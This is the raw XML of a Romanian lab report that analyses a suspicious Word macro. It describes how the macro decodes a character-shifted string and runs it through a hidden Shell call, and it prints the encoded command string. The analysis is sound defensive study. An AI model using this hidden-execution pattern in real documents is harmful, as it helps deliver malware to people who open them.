          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Atribuirea șirului:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:left="1418"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Codul atribuie o valoare șir de caractere variabilei </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>xxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Șirul pare a fi codificat. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:left="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Atribuirea unui șir gol:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:left="1418"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Un șir gol este atribuit variabilei </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>yyy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:left="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Atribuirea unui număr întreg:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:left="1418"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Valoarea </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> este atribuită variabilei </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:left="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Buclă:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:left="1418"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Codul iterează printr-o buclă, de la </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> la lungimea șirului </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>xxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:left="1418"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">În interiorul buclei, codul: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:left="2127"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Extrage un singur caracter din șirul </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>xxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> la poziția curentă (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:left="2127"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Convertește caracterul în codul său ASCII folosind funcția </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Asc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:left="2127"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Deplasează codul ASCII cu valoarea variabilei </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:left="2127"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Convertește codul ASCII decalat înapoi într-un caracter folosind funcția </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Chr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:left="2127"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Concatenează caracterul decalat la șirul </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>yyy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:left="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Apelarea funcției Shell:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:left="1418"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">După finalizarea buclei, codul apelează funcția </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> cu șirul </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>yyy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ca argument. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:left="1418"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Argumentul </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vbHide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> este probabil inclus pentru a ascunde fereastra creată de funcția </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:left="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sfârșitul Subrutinei:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:left="1418"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Codul termină subrutina. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Pentu a afla ce este `</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>ebn.fyf0{dy5vhujwll/}5{hn5wl5lr5wlvl.fyf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>` vom avea nevoi de un script:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>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52515" cy="1494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52515" cy="1494790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>igura 7 — Algoritmul invers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Algoritmul dat este un algoritm simplu de decriptare prin substituție, în care fiecare caracter din șirul criptat este deplasat înapoi cu un număr fix de poziții, specificat de valoarea cheii </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, pentru a obține caracterul original. Acest proces este aplicat la fiecare caracter din șirul criptat, iar rezultatul este șirul decriptat.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>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52515" cy="3206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52515" cy="320675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 8 — Stringul optinut </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>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cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>oncluzie: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BodyText"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>Analiza macrosurilor în Word este un proces esențial pentru evaluarea potențialelor amenințări și vulnerabilități asociate cu utilizarea acestora. Scopul este identificarea funcționalității și a surselor acestor macrosuri, verificarea autenticității documentelor și evaluarea riscurilor asociate cu utilizarea lor. Prin implementarea politicilor de securitate adecvate, se urmărește reducerea riscului de expunere la amenințări cibernetice și protejarea securității informațiilor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:type w:val="nextPage"/>
      <w:pgSz w:w="12240" w:h="15840"/>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Bookman Old Style">
    <w:charset w:val="01"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Times New roman">
    <w:charset w:val="01"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Times New Roman">
    <w:charset w:val="01"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Cascadia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e20a7"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="42"/>
      <w:szCs w:val="42"/>
      <w:lang w:val="ro-RO"/>
    </w:rPr>
